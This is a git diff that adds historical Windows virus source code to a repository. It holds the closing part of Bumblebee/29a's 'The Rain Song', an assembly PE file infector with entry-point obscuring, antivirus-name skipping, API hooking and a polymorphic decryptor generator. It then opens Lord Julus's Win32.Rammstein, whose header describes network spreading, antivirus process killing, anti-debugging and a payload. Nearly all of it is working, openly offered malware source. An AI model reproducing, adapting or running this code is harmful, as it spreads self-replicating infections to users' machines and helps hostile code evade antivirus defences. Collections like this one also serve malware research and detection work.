+updateVSample: + lea esi,vBegin+ebp + mov edi,dword ptr [memHnd+ebp] + mov ecx,vSize + rep movsb + + mov ecx,crptSecondEND-crptSecondINI + mov esi,crptSecondINI-vBegin + add esi,dword ptr [memHnd+ebp] +secondEnLayerLoop: + not byte ptr [esi] + inc esi + loop secondEnLayerLoop + + mov ecx,dword ptr [CodeSize+ebp] + mov esi,crptINI-vBegin + add esi,dword ptr [memHnd+ebp] + mov eax,dword ptr [CrptKey+ebp] +encrptLoop: + xor dword ptr [esi],eax + add esi,4 + loop encrptLoop + ret +; +; Infects PE file increasing last section. +; +; ESI: addr of file name of PE to infect. +; +infect: + pushad + mov dword ptr [fNameAddr+ebp],esi + + push esi + push esi + call dword ptr [_GetFileAttributesA+ebp] + pop esi + inc eax + jz infectionError + dec eax + + mov dword ptr [fileAttrib+ebp],eax + + push esi + push 00000080h + push esi + call dword ptr [_SetFileAttributesA+ebp] + pop esi + or eax,eax + jz infectionError + + xor eax,eax + push eax + push 00000080h + push 00000003h + push eax + push eax + push 80000000h OR 40000000h + push esi + call dword ptr [_CreateFileA+ebp] + inc eax + jz infectionErrorAttrib + dec eax + + mov dword ptr [fHnd+ebp],eax + + push 0h + push eax + call dword ptr [_GetFileSize+ebp] + inc eax + jz infectionErrorClose + dec eax + + mov dword ptr [fileSize+ebp],eax + + lea edi,fileTime2+ebp + push edi + lea edi,fileTime1+ebp + push edi + lea edi,fileTime0+ebp + push edi + push dword ptr [fHnd+ebp] + call dword ptr [_GetFileTime+ebp] + or eax,eax + jz infectionErrorClose + + xor eax,eax + push eax + push eax + push eax + push 00000004h + push eax + push dword ptr [fHnd+ebp] + call dword ptr [_CreateFileMappingA+ebp] + or eax,eax + jz infectionErrorClose + + mov dword ptr [fhmap+ebp],eax + + xor eax,eax + push eax + push eax + push eax + push 00000004h OR 00000002h + push dword ptr [fhmap+ebp] + call dword ptr [_MapViewOfFile+ebp] + or eax,eax + jz infectionErrorCloseMap + + mov dword ptr [mapMem+ebp],eax + + mov edi,eax + cmp word ptr [edi],'ZM' + jne infectionErrorCloseUnmap + + add edi,dword ptr [edi+3ch] + cmp eax,edi + ja infectionErrorCloseUnmap ; avoid fucking headers + add eax,dword ptr [fileSize+ebp] + cmp eax,edi + jb infectionErrorCloseUnmap ; avoid fucking headers + cmp word ptr [edi],'EP' + jne infectionErrorCloseUnmap + + mov edx,dword ptr [edi+16h] ; test it's a valid PE + test edx,2h ; i want executable + jz infectionErrorCloseUnmap + and edx,2000h ; i don't want DLL + jnz infectionErrorCloseUnmap + mov dx,word ptr [edi+5ch] + dec edx ; i don't want NATIVE + jz infectionErrorCloseUnmap + + mov edx,edi + + mov esi,edi + mov eax,18h + add ax,word ptr [edi+14h] + add edi,eax + mov dword ptr [fstSec+ebp],edi + + push edx + mov cx,word ptr [esi+06h] + mov ax,28h + dec cx + mul cx + add edi,eax + pop edx + + test dword ptr [edi+24h],10000000h ; avoid this kind of section + jnz infectionErrorCloseUnmap ; we can corrupt it! + + test dword ptr [edi+24h],0e0000020h ; mmm... This is infected yet + jz infectionErrorCloseUnmap ; another bug! must be jnz + + mov eax,dword ptr [edi+10h] ; i rely on the headers... + add eax,dword ptr [edi+14h] + mov dword ptr [fileSize+ebp],eax + + sub eax,dword ptr [edi+14h] ; calc our RVA + add eax,dword ptr [edi+0ch] + mov dword ptr [myRVA+ebp],eax + ; save virus entry point to calc relocations in + ; execution time + add eax,dword ptr [esi+34h] + mov dword ptr [virusEP+ebp],eax + + mov eax,dword ptr [edi+08h] ; fix the virtual size + push edx ; if needed + mov ecx,dword ptr [edx+38h] ; some PE have strange + xor edx,edx ; virt size (cdplayer p.e.) + div ecx + inc eax + or edx,edx + jz rvaFixDone + xor edx,edx + mul ecx + + mov dword ptr [edi+08h],eax ; save the fixed virt size +rvaFixDone: + + ; save image base for hook API + mov edx,dword ptr [esi+34h] + mov dword ptr [imageBase+ebp],edx + pop edx + + call searchEPO ; Search for a call + jc notEPO + + push edi edx ecx ; patch the call + mov edx,dword ptr [myRVA+ebp] + add edx,dword ptr [esi+34h] ; edx = dest rva + mov edi,dword ptr [EPORva+ebp] + add edi,dword ptr [esi+34h] ; edi = call rva + sub edx,edi + sub edx,5 ; edx patch the call + mov ecx,dword ptr [EPOAddr+ebp] + xchg dword ptr [ecx+1],edx + add edx,edi ; get the rva + add edx,5 + mov dword ptr [hostRET+ebp],edx ; and store it ;) + pop ecx edx edi + + jmp yeahEPO +notEPO: + call lightEPO ; try light EPO + jc notNotEPO + + push edx ecx ; add the jump + mov ecx,dword ptr [myRVA+ebp] + add ecx,dword ptr [esi+34h] ; ecx = dest rva + mov edx,dword ptr [EPORva+ebp] + mov dword ptr [myRVA+ebp],edx + add edx,dword ptr [esi+34h] ; edx = jmp rva + sub ecx,edx + sub ecx,5 ; ecx the addr jmp + mov edx,dword ptr [EPOAddr+ebp] + mov byte ptr [edx],0e9h + mov dword ptr [edx+1],ecx + pop ecx edx + ; now lets the header be patched with this data ;) + +notNotEPO: + ; if i can't found a nice call to patch and i can't add + ; a jump in the end of the code section i use the non-EPO + ; infection. This could be a problem for the wild time + ; of the virus 'cause heuristics can fake it easily + ; but we want to be infectious ;) + push edi ; store new ep and get old + mov edi,dword ptr [myRVA+ebp] ; set edi=new ep + mov dword ptr [EPOAddr+ebp],0 ; getk32 changes if epo! + + xchg edi,dword ptr [esi+28h] ; get host EP and set new + add edi,dword ptr [esi+34h] + mov dword ptr [hostRET+ebp],edi ; save it + pop edi +yeahEPO: + push edx ; calc the new virtual size + mov eax,dword ptr [virtsize+ebp] ; for the section + mov ecx,dword ptr [edx+38h] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + pop edx + + add dword ptr [edi+08h],eax ; fix the virtual size + add dword ptr [edx+50h],eax ; fix the image size + + or dword ptr [edi+24h],0e0000020h ; set the properties + + push edx ; calc new size for + mov eax,dword ptr [gensize+ebp] ; the section + mov ecx,dword ptr [edx+3ch] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + pop edx + + add dword ptr [edi+10h],eax ; store the phys size + + push edx ; calc file padding + mov ecx,PADDING ; (infection sign) + add eax,dword ptr [fileSize+ebp] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + mov dword ptr [pad+ebp],eax + pop edx + + ; update the virus sample ready to infect. + call updateVSample + + push dword ptr [mapMem+ebp] + call dword ptr [_UnmapViewOfFile+ebp] + + push dword ptr [fhmap+ebp] + call dword ptr [_CloseHandle+ebp] + + xor eax,eax + push eax + push dword ptr [pad+ebp] + push eax + push 00000004h + push eax + push dword ptr [fHnd+ebp] + call dword ptr [_CreateFileMappingA+ebp] + or eax,eax + jz infectionErrorClose + + mov dword ptr [fhmap+ebp],eax + + xor eax,eax + push dword ptr [pad+ebp] + push eax + push eax + push 00000004h OR 00000002h + push dword ptr [fhmap+ebp] + call dword ptr [_MapViewOfFile+ebp] + or eax,eax + jz infectionErrorCloseMap + + mov dword ptr [mapMem+ebp],eax + + mov ecx,dword ptr [gensize+ebp] + mov esi,dword ptr [memHnd+ebp] + mov edi,eax + add edi,dword ptr [fileSize+ebp] + rep movsb + + xchg ecx,eax ; Why i want the padding + mov eax,edi ; to be zeroes? + sub eax,ecx ; bah only one 'pijada' + mov ecx,dword ptr [pad+ebp] + sub ecx,eax + xor eax,eax + rep stosb + +infectionErrorCloseUnmap: + push dword ptr [mapMem+ebp] + call dword ptr [_UnmapViewOfFile+ebp] + +infectionErrorCloseMap: + push dword ptr [fhmap+ebp] + call dword ptr [_CloseHandle+ebp] + + lea edi,fileTime2+ebp + push edi + lea edi,fileTime1+ebp + push edi + lea edi,fileTime0+ebp + push edi + push dword ptr [fHnd+ebp] + call dword ptr [_SetFileTime+ebp] + +infectionErrorClose: + push dword ptr [fHnd+ebp] + call dword ptr [_CloseHandle+ebp] + +infectionErrorAttrib: + push dword ptr [fileAttrib+ebp] + push dword ptr [fNameAddr+ebp] + call dword ptr [_SetFileAttributesA+ebp] + +infectionError: + popad + ret + +; +; This my 'search EPO' routine. Searches for a call into the code section +; that points to: +; +; push ebp +; mov ebp,esp +; +; This is the way the high level lenguages get the arguments used to call +; a procedure. If this code is found i assume the call found it's correct +; and i patch it to jump into the virus. +; +; I tested selecting the call randomly, but this is not needed. There +; could be calls that points the desired code and call that are not +; useful for the virus. Av cannot know wich is the call patched utill +; it finds it. Moreover using 1st found call i'm more sure that the virus +; will be executed! And this is good enought to fuck most cool heuristics. +; +searchEPO: + pushad + mov edi,dword ptr [esi+28h] ; get host EP + + xor ecx,ecx + mov cx,word ptr [esi+06h] ; number of sections + mov esi,dword ptr [fstSec+ebp] ; get 1st section addr + +sectionLoop: ; look for code section + mov ebx,dword ptr [esi+0ch] + add ebx,dword ptr [esi+08h] ; test it's inside this + cmp edi,ebx ; section + jb sectionFound + add esi,28h + dec ecx + jnz sectionLoop + stc + jmp searchEPOOut + +sectionFound: + test dword ptr [esi+24h],10000000h ; avoid this kind of section + jnz searchEPOFail ; we can corrupt it! + + push esi + sub edi,dword ptr [esi+0ch] ; get raw address + add edi,dword ptr [esi+14h] + mov ecx,dword ptr [esi+10h] + cmp ecx,edi + jna searchEPOFail + sub ecx,edi + add edi,dword ptr [mapMem+ebp] + mov ebx,edi + add ebx,ecx + sub ebx,10h ; high secure fence +callLoop: ; loop that searches + cmp byte ptr [edi],0e8h ; for the call + jne continueCallLoop + mov edx,edi + add edx,dword ptr [edi+1] + add edx,5 + cmp ebx,edx + jb continueCallLoop + cmp edx,dword ptr [mapMem+ebp] + jb continueCallLoop + mov esi,edx + mov dx,word ptr [esi] + cmp dx,08b55h + jne continueCallLoop + mov dx,word ptr [esi+1] + cmp dx,0ec8bh + jne continueCallLoop + mov dword ptr [EPOAddr+ebp],edi + sub edi,dword ptr [mapMem+ebp] + pop esi + add edi,dword ptr [esi+0ch] ; get rva address + sub edi,dword ptr [esi+14h] + mov dword ptr [EPORva+ebp],edi + clc + jmp searchEPOOut +continueCallLoop: + inc edi + loop callLoop +searchEPOFail: + pop esi + stc +searchEPOOut: + popad + ret +; +; This makes a light EPO. Looks for space in the code section to +; put there a jump to virus code. The header is patched but this +; patch is less notorious. This EPO requires phys size of section +; bigger than virtual size + 5 (the size of the jump). +; +lightEPO: + pushad + mov edi,dword ptr [esi+28h] ; get host EP + + xor ecx,ecx + mov cx,word ptr [esi+06h] ; number of sections + mov esi,dword ptr [fstSec+ebp] ; get 1st section addr + +lightSectionLoop: ; look for code section + mov ebx,dword ptr [esi+0ch] + add ebx,dword ptr [esi+08h] ; test it's inside this + cmp edi,ebx ; section + jb lightSectionFound + add esi,28h + dec ecx + jnz lightSectionLoop +lightEPOFail: + stc + jmp lightEPOOut + +lightSectionFound: + test dword ptr [esi+24h],10000000h ; avoid this kind of section + jnz lightEPOFail ; we can corrupt it! + + mov eax,dword ptr [esi+08h] ; virtual size + add eax,5 ; plus the code we add + cmp eax,dword ptr [esi+10h] ; bigger than phys size? + ja lightEPOFail + mov edi,dword ptr [mapMem+ebp] ; get raw address + add edi,dword ptr [esi+08h] + add edi,dword ptr [esi+14h] + mov dword ptr [esi+08h],eax ; increase 5 bytes + mov dword ptr [EPOAddr+ebp],edi + sub edi,dword ptr [mapMem+ebp] + add edi,dword ptr [esi+0ch] ; get rva address + sub edi,dword ptr [esi+14h] + mov dword ptr [EPORva+ebp],edi + clc +lightEPOOut: + popad + ret +; +; Infects PE files in current directory. +; +infectDir: + pushad + + lea esi,find_data+ebp + push esi + lea esi,fndMask+ebp + push esi + call dword ptr [_FindFirstFileA+ebp] + inc eax + jz notFound + dec eax + + mov dword ptr [findHnd+ebp],eax + +findNext: + lea esi,find_data.cFileName+ebp + call stringUp + lea esi,stringBuffer+ebp + push edi ; test the string it's + sub edi,esi ; long enought + cmp edi,5 + pop edi + jna skipThisFile + cmp dword ptr [edi-4],'EXE.' + je validFileExt + cmp dword ptr [edi-4],'RCS.' + jne skipThisFile + +validFileExt: + mov eax,dword ptr [find_data.nFileSizeLow+ebp] + cmp eax,4000h + jb skipThisFile ; at least 4000h bytes? + mov ecx,PADDING ; test if it's infected + xor edx,edx ; yet + div ecx + or edx,edx ; reminder is zero? + jz skipThisFile + +testIfAv: ; let's search for strings + ; that may appear in av progs + lea edi,avStrings+ebp + mov ecx,vStringsCout +testIfAvL: + push esi + mov ax,word ptr [edi] +testAvLoop: + cmp word ptr [esi],ax + jne contTestLoop + pop esi + jmp skipThisFile +contTestLoop: + inc esi + cmp byte ptr [esi+3],0 ; skip the ext + jne testAvLoop + pop esi + add edi,2 + loop testIfAvL + + call infect + +skipThisFile: + lea esi,find_data+ebp + push esi + push dword ptr [findHnd+ebp] + call dword ptr [_FindNextFileA+ebp] ; Find next file + or eax,eax + jnz findNext + + push dword ptr [findHnd+ebp] + call dword ptr [_FindClose+ebp] + +notFound: + popad + ret + +; +; Virus data --------------------------------------------------------------- +; +HOOKTABLEBEGIN label byte + dd offset _CreateFileA + dd offset Hook0 + dd offset _MoveFileA + dd offset Hook1 + dd offset _CopyFileA + dd offset Hook2 + dd offset _CreateProcessA + dd offset Hook3 + dd offset _SetFileAttributesA + dd offset Hook4 + dd offset _GetFileAttributesA + dd offset Hook5 + dd offset _SearchPathA + dd offset Hook6 +HOOKTABLEEND label byte +EPOAddr dd 0 + +copyright db '< The Rain Song Coded By Bumblebee/29a >',0dh,0ah + + ; little tribute +message db 'ASIMOV Jan.2.1920 - Apr.6.1992',0 + +FSTAPI label byte +CrcCreateFileA dd 08c892ddfh + db 12 +_CreateFileA dd 0 + +CrcMapViewOfFile dd 0797b49ech + db 14 +_MapViewOfFile dd 0 + +CrcCreatFileMappingA dd 096b2d96ch + db 19 +_CreateFileMappingA dd 0 + +CrcUnmapViewOfFile dd 094524b42h + db 16 +_UnmapViewOfFile dd 0 + +CrcCloseHandle dd 068624a9dh + db 12 +_CloseHandle dd 0 + +CrcFindFirstFileA dd 0ae17ebefh + db 15 +_FindFirstFileA dd 0 + +CrcFindNextFileA dd 0aa700106h + db 14 +_FindNextFileA dd 0 + +CrcFindClose dd 0c200be21h + db 10 +_FindClose dd 0 + +CrcVirtualAlloc dd 04402890eh + db 13 +_VirtualAlloc dd 0 + +CrcGetTickCount dd 0613fd7bah + db 13 +_GetTickCount dd 0 + +CrcGetFileTime dd 04434e8feh + db 12 +_GetFileTime dd 0 + +CrcSetFileTime dd 04b2a3e7dh + db 12 +_SetFileTime dd 0 + +CrcSetFileAttributesA dd 03c19e536h + db 19 +_SetFileAttributesA dd 0 + +CrcGetFileAttributesA dd 0c633d3deh + db 19 +_GetFileAttributesA dd 0 + +CrcGetFileSize dd 0ef7d811bh + db 12 +_GetFileSize dd 0 + +CrcGetSystemTime dd 075b7ebe8h + db 14 +_GetSystemTime dd 0 + +CrcFatalAppExitA dd 0253ab1b9h + db 14 +_FatalAppExitA dd 0 + +CrcMoveFileA dd 02308923fh + db 10 +_MoveFileA dd 0 + +CrcCopyFileA dd 05bd05db1h + db 10 +_CopyFileA dd 0 + +CrcCreateProcessA dd 0267e0b05h + db 15 +_CreateProcessA dd 0 + +CrcSearchPathA dd 0f4d9d033h + db 12 +_SearchPathA dd 0 + +CrcGetCurrentDirectoryA dd 0ebc6c18bh + db 21 +_GetCurrentDirectoryA dd 0 + +CrcSetCurrentDirectoryA dd 0b2dbd7dch + db 21 +_SetCurrentDirectoryA dd 0 + +CrcGetWindowsDirectoryA dd 0fe248274h + db 21 +_GetWindowsDirectoryA dd 0 +ENDAPI label byte + +; AV: AVP, PAV, NAV, ... +; AN: SCAN, VISUSSCAN, ... +; DR: DRWEB +; ID: SPIDER +; OD: NOD-ICE +; TB: THUNDERBYTE... (this still exists?) +; F-: F-PROT, ... +avStrings dw 'VA','NA','RD','DI','DO','BT','-F' +vStringsCout equ (offset $-offset avStrings)/2 +fndMask db '*.*',0 +; +; Virus data ends here ----------------------------------------------------- +; + +; +; Polymorphic Engine (V2LPE - Very^2 Lame Polymorphic Engine) +; +; This is a simple polymorphic engine. Uses some piezes of code from +; AOCPE. Very, very lame :( But does its work as poly engine. May be +; its size the only one point for. +; +; EAX: CrptKey +; ECX: CodeSize (code to decrypt prepared yet) +; EDI: Destination address +; +; returns EAX: size of generated proc +; +GenDCrpt: + pushad ; setup regs status + xor eax,eax + lea edi,RegStatus+ebp + mov ecx,8 + rep stosb + popad + mov byte ptr [RegStatus+ebp+_EBP],1 + mov byte ptr [RegStatus+ebp+_ESP],1 + mov dword ptr [CrptKey+ebp],eax + mov dword ptr [CodeSize+ebp],ecx + + push edi + + xor eax,eax + call GetReg + mov byte ptr [KeyReg+ebp],al + + call AddShit + + mov cl,_EBP + call AddPushREG + + call AddShit + + mov ax,0ec8bh + stosw + + call AddShit + + mov edx,04h + mov cl,_EBP + call AddMovREGMEMEBP + + call AddShit + + mov cl,byte ptr [KeyReg+ebp] + call AddPushREG + + call AddShit + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + call AddMovREGINM + + call AddShit + + call GetReg + mov byte ptr [LoopReg+ebp],al + + mov cl,al + call AddPushREG + + call AddShit + + mov cl,byte ptr [LoopReg+ebp] + mov edx,dword ptr [CodeSize+ebp] + call AddMovREGINM + + call AddShit + + push edi + + mov cl,byte ptr [KeyReg+ebp] + call AddXorMEMEBPREG + + call AddShit + + mov cl,_EBP + mov edx,04h + call AddAddREGINM + + call AddShit + + mov cl,byte ptr [LoopReg+ebp] + mov edx,1 + call AddSubREGINM + + pop ebx + mov eax,edi + sub eax,ebx + push eax + mov al,75h + stosb + pop eax + mov ah,0feh + xchg al,ah + sub al,ah + stosb + + call AddShit + + mov cl,byte ptr [LoopReg+ebp] + call AddPopREG + + call AddShit + + mov al,byte ptr [LoopReg+ebp] + call FreeReg + + mov cl,byte ptr [KeyReg+ebp] + call AddPopREG + + call AddShit + + mov cl,_EBP + call AddPopREG + + call AddShit + + mov al,0c3h + stosb + + pop esi + sub edi,esi + mov eax,edi + ret + +; +; Poly engine data +; +_EAX equ 0 +_ECX equ 1 +_EDX equ 2 +_EBX equ 3 +_ESP equ 4 +_EBP equ 5 +_ESI equ 6 +_EDI equ 7 +RegStatus db 8 dup(0) +KeyReg db 0 +LoopReg db 0 +CrptKey dd 0 +CodeSize dd 0 +Rnd db ? + +; +; returns AL: selected register +; +GetReg: + xor eax,eax + mov al,byte ptr [CrptKey+ebp] +GetReg1: + and al,7 + lea ecx,RegStatus+ebp + add ecx,eax + mov dl,byte ptr [ecx] + or dl,dl + jz GetReg0 + inc al + jmp GetReg1 +GetReg0: + mov byte ptr [ecx],1 + ret + +; +; AL: selected register to free +; +FreeReg: + and eax,7 + lea ecx,RegStatus+ebp + add ecx,eax + mov byte ptr [ecx],0 + ret + +; +; Instruction generators +; +; EDI: Destination code +; ECX: Reg (if applicable) +; EDX: Inm (if applicable) +; + +AddPushREG: + mov al,050h + add al,cl + stosb + ret + +AddPopREG: + mov al,058h + add al,cl + stosb + ret + +AddMovREGINM: + mov al,0b8h + add al,cl + stosb + mov eax,edx + stosd + ret + +AddMovREGMEMEBP: + mov al,08bh + stosb + mov al,08h + mul cl + add al,85h + stosb + mov eax,edx + stosd + ret + +AddXorMEMEBPREG: + mov al,031h + stosb + mov al,08h + mul cl + add al,45h + stosb + xor al,al + stosb + ret + +AddAddREGINM: + or cl,cl + jnz AddAddREGINM0 + mov al,05h + stosb + jmp AddAddREGINM1 +AddAddREGINM0: + mov al,081h + stosb + mov al,0c0h + add al,cl + stosb +AddAddREGINM1: + mov eax,edx + stosd + ret + +AddSubREGINM: + or cl,cl + jnz AddSubREGINM0 + mov al,2dh + stosb + jmp AddSubREGINM1 +AddSubREGINM0: + mov al,081h + stosb + mov al,0e8h + add al,cl + stosb +AddSubREGINM1: + mov eax,edx + stosd + ret +; +; Yet another lame shit generator by Bumblebee ;) +; +AddShit: + mov eax,dword ptr [CrptKey+ebp] + add byte ptr [Rnd+ebp],al + and al,1 + jz AddShit2 + + xor eax,eax + mov al,byte ptr [Rnd+ebp] + lea edx,shit0+ebp + and al,7 + mov cl,2 + mul cl + add edx,eax + mov ax,word ptr [edx] + stosw + + mov al,byte ptr [Rnd+ebp] + and al,2 + jz AddShit2 + + lea edx,shit1+ebp + mov al,byte ptr [Rnd+ebp] + and al,3 + mov cl,2 + mul cl + add edx,eax + mov ax,word ptr [edx] + stosw + stosw + ret + +AddShit2: + xor eax,eax + mov al,byte ptr [Rnd+ebp] + lea edx,shit0+ebp + and al,7 + mov cl,2 + mul cl + add edx,eax + mov ax,word ptr [edx] + stosw + + lea edx,shit0+ebp + add edx,2 + mov al,byte ptr [Rnd+ebp] + and al,3 + mov cl,2 + mul cl + add edx,eax + mov ax,word ptr [edx] + stosw + + ret +; some do-nothing opcodes +shit0: dw 9090h,0db87h,0c987h,0d287h,4840h,434bh,4941h,4a42h +shit1: dw 0d0f7h,0d3f7h,0d1f7h,0d2f7h + +crptSecondEND label byte +; Decryptor for the second layer. +secondLayerDecrypt: + push ebp + mov ebp,esp + push ecx + mov ebp,dword ptr [ebp+4] + mov ecx,crptSecondEND-crptSecondINI +secondLayerLoop: + not byte ptr [ebp] + inc ebp + loop secondLayerLoop + pop ecx ebp + ret + +crptEND label byte +vEnd label byte + +; This is a fake decryptor for the 1st generation. Allows the virus to +; skip the second layer decryptor. +crypt: + pop edx + lea edx,crptSecondINI + push edx + ret +; +; Temp data. Not stored into the file, only 1st generation. +; +BUFFERBEGIN label byte +stringBuffer db STRINGTOP dup(0) +tmpPath db STRINGTOP dup(0) +address dd 0 +names dd 0 +ordinals dd 0 +nexports dd 0 +expcount dd 0 +memHnd dd 0 + +fHnd dd 0 +fhmap dd 0 +mapMem dd 0 + +fileSize dd 0 +fileAttrib dd 0 +fileTime0 dd 0,0 +fileTime1 dd 0,0 +fileTime2 dd 0,0 +pad dd 0 +fNameAddr dd 0 +gensize dd 0 +virtsize dd 0 +myRVA dd 0 +fstSec dd 0 +find_data WIN32_FIND_DATA <0> +findHnd dd 0 +semHook db 0 +EPORva dd 0 +BUFFEREND label byte +BUFFERSIZE equ BUFFEREND-BUFFERBEGIN + +; +; For 1st generation only. +; +fakeHost: + push 0h + call ExitProcess +Ends +End inicio diff --git a/Win32/Win32.Rammstien.asm b/Win32/Win32.Rammstien.asm new file mode 100644 index 00000000..72af66b3 --- /dev/null +++ b/Win32/Win32.Rammstien.asm @@ -0,0 +1,10504 @@ + +陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳[RAMM.ASM]陳 +comment $ + 栩栩栩栩栩栩栩栩栩栩栩栩栩 + 栩 炳 炳 炳 + 栩 栩 + 栩桎烝 樂 栩 + 栩 烝烝桎烝 栩 + 栩 樂 栩 + 栩栩栩栩栩栩栩栩栩栩栩栩栩 + + 樛樛樛 樛樛樛 樛樛樛 樛樛樛 樛樛樛 樛樛樛 樛樛 樛 樛 + 樛 樛 樛樛 樂炳 樛樛 桀 樂 炳 + 樛 樛 桀樛 桀 樂 樛樂 樂 桀 桀 + 桀桀樛 桀 桀 桀桎桀 桀桎桀 桀樛樛 烝 桀樛樛 桀樛 桀桎桀 + + v4.0 + + = Final Release = + + (c) Lord Julus / 29A (Nov 2000) + + + =================================================================== + + DISCLAIMER + + This is the source code of a virus. Possesing, using, spreading of + this source code, compiling and linking it, possesing, using and + spreading of the executable form is illegal and it is forbidden. + Should you do such a thing, the author may not be held responsible + for any damage that occured from the use of this source code. The + actual purpose of this source code is for educational purposes and + as an object of study. This source code comes as is and the author + cannot be held responsible for the existance of other modified + variants of this code. + + ==================================================================== + + History: + + 09 Sep 2000 - Today I made a small improvement. When the dropper roams + the net onto another computer it remains in the windows + dir and it represents a weak point which might be noticed + by an av. So, now, the virus will smartly remove either + the dropper or the entry in the win.ini file if one of + them is missing. If both are there, they are left alone + because they will remove eachother. Added Pstores.exe to + the black list. Thanks to Evul for pointing me out that + it is a rather peculiar file and cannot be safely + infected. + + 22 Jul 2000 - The virus has moved up to version 4.0. Today I added + the network infector. It comes in a separate thread. + For the moment looks like everything works fine. Will + add a timer to it so that it does not hang in huge + networks... Virus is above 13k now... Waiting for the + LZ! + + 18 Jul 2000 - Fixed a bug in the section increase algorithm: if you + want to have a good compatibility you NEED to place the + viral code exactly at the end of file and NOT at the + end of the VirtualSize or SizeOfRawData as it appears + in the section header, because many files get their + real size calculated at load time in some way. + HURRAY!!! YES!! I fixed a shitty bug! If you do section + add you MUST check also if any directory VA follows + immediately the last section header so that you will + not overwrite it. Now almost all files work ok under + NT!!!! However, I don't seem to be able to make + outlook.exe get infected so I put it on the black list. + The other MsOffice executables get infected correctly + on both Win9x and WinNT. + + 17 Jul 2000 - Have started some optimizations and proceduralizations + (;-)))). The virus is quickly going towards 13k so I + am quite anxious to implement my new LZ routine to + decrease it's size. I fixed a bug: WinNT NEEDS the + size of headers value to be aligned to file alignment. + + 14 Jul 2000 - Worked heavily on the WindowsNT compatibility. In this + way I was able to spot 2 bugs in the infection routine, + one regarding RVA of the new section and one regarding + the situation when the imports cannot be found by the api + hooker. Still thinking if I should rearrange relocs also? + Now files are loaded under WindowsNT (NT image is correct) + but they cannot fully initialize. Will research some + more. + + 03 Jun 2000 - Added an encryption layer with no key, just a rol/ror + routine on parity. Also added some MMX commands. Fixed + a few things. + + 22 May 2000 - Added EPO on files that have the viral code outside the + code section. Basically from now on the entry point stays + only into the code section. The epo is not actually epo, + because as I started to code it I decided to make it very + complicated so I will include the complicated part in the + next release. It will be the so called LJILE32 . This engine will + allow me to have an exact location of the opcode for each + instruction so we will be able to look up any call, jump + or conditional jump to place our code call there. So for + this version only a jump at the original eip. + + 21 May 2000 - Fixed a bug in the api hooker... I forgot that some import + sections have a null pointer to names. Also added the + infection by last section increase for files who cannot + be infected otherwise. All files should be touched now. + Also I fixed the problem with the payload window not + closing after the process closed. I solved half of it + as some files like wordpad.exe still have this problem. + + 20 May 2000 - Prizzy helped me a lot by pointing out to me that in + order to have the copro working ok I need to save it's + environment so that the data of the victim process in + not altered. thanx!! Also fixed the cpuid read. + + 14 May 2000 - Released first beta version to be tested + + ==================================================================== + Virus Name ........... Win32.Rammstein + Virus Version ........ 4.0 + Virus Size ........... 14002 (debug), 15176 (release) + Virus Author ......... Lord Julus / 29A + Release Date ......... 30 Nov 2000 + Virus type ........... PE infector + Target OS ............ Win95, Win98, WinNT, Win2000 + Target Files ......... many PE file types: + EXE COM ACM CPL HDI OCX PCI + QTC SCR X32 CNV FMT OCM OLB WPC + Append Method ........ The virus will check wether there is enough room + for it inside the code section. If there is not + enough room the virus will be placed at end. If + there is it will be inserted inside the code + section at a random offset while the original + code will be saved at end. The placing at the end + has also two variants. If the last section is + Resources or Relocations the virus will insert a + new section before the last section and place the + data there, also rearranging the last section's + RVAs. If the last section is another section a + new section will be placed at end. The name of + the new section is a common section name which is + choosed based on the existing names so that it + does not repeat. If the virus is placed at the + end just a small EPO code is used so that the eip + stays inside the code section. + A special situation occurs if there is no enough + space to add a new section header, for example + when the code section starts at RVA 200 (end of + headers). In this situation the virus will + increase the last section in order to append. + Infect Methods ....... -Direct file attacks: the virus will attack + specific files in the windows directory, files + which are most used by people + -Directory scan: all files in the current + directory will be infected, as well as 3 files in + the system directory and 3 in the windows + directory + -Api hooking (per-process residency): the virus + hooks a few api calls and infects files as the + victim uses the apis + -Intranet spreading: the virus spreads into the + LAN using only windows apis + Features ............. Multiple threads: the virus launches a main + thread. While this thread executes, in the same + time, the original thread returns to host, so no + slowing down appears. The main viral thread + launches other 6 threads and monitors their + execution. If one of the threads is not able to + finish the system is hanged because it means + somebody tryied to patch some of the thread code. + Heavy anti-debugging: i tried to use almost all + the anti-debug and anti-emulation stuff that I + know + FPU: uses fpu instructions + Crc32 search: uses crc32 to avoid waste of space + Memory roaming: allocates virtual memory and + jumps in it + Interlaced code: this means that some threads + share the same piece of code and the virus is + careful to let only one in the same time + otherwise we get some of the variables distroyed. + Preety hard to be emulated by avs. + Also features semaphores, timers + Marks infection using the Pythagoreic numbers. + SEH: the virus creates 9 SEH handlers, for each + thread and for the main thread. +(*) Polymorphic .......... Yes (2 engines: Modularis, LJFPE32) +(*) Metamorphic .......... Yes (mild custom metamorphic engine) + Encrypted ............ Yes + Safety ............... Yes (avoids infecting many files) + Kill AV Processes .... Yes + Payload .............. On 14th every even month the infected process + will launch a thread that will display random + windows with some of the Rammstein's lyrics. + Pretty annoying... Probably this is the first + virus that actually creates real windows and + processes their messages. The windows shut down + as the victim process closes. + + + (*) Feature not included in this version. + + Debug notes: please note that this source code features many ways of + debugging. You may turn on and off most of the virus's features by + turning some variables to TRUE or FALSE. + ==================================================================== + + $ + +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +.586p ; +.model flat, stdcall ; + ; +extrn MessageBoxA:proc ; +extrn ExitProcess: proc ; + ; +TRUE = 1 ; +FALSE = 0 ; +DEBUG = TRUE ;debug on? +ANTIEMU = TRUE ;anti-debuggin/emulation? +JUMP = TRUE ;allocate and jump in mem? +DIRECT = TRUE ;direct action? +ANTIAV = TRUE ;anti-av feature? +APIHOOK = TRUE ;hook imported apis? +MAINTHREAD = TRUE ;launch a main thread? +PAYLOAD = TRUE ;use payload? +RANDOMIZE_ENTRY = TRUE ;randomize code sec entry? +EPO = TRUE ;Use EPO +MMX = FALSE ; +NETWORKINFECTION = TRUE ; +VIRUSNOTIFYENTRY = FALSE ;msgbox at virus start? +VIRUSNOTIFYEXIT = FALSE ;msgbox at virus end? +VIRUSNOTIFYHOOK = FALSE ; +MAINTHREADSEH = TRUE ; 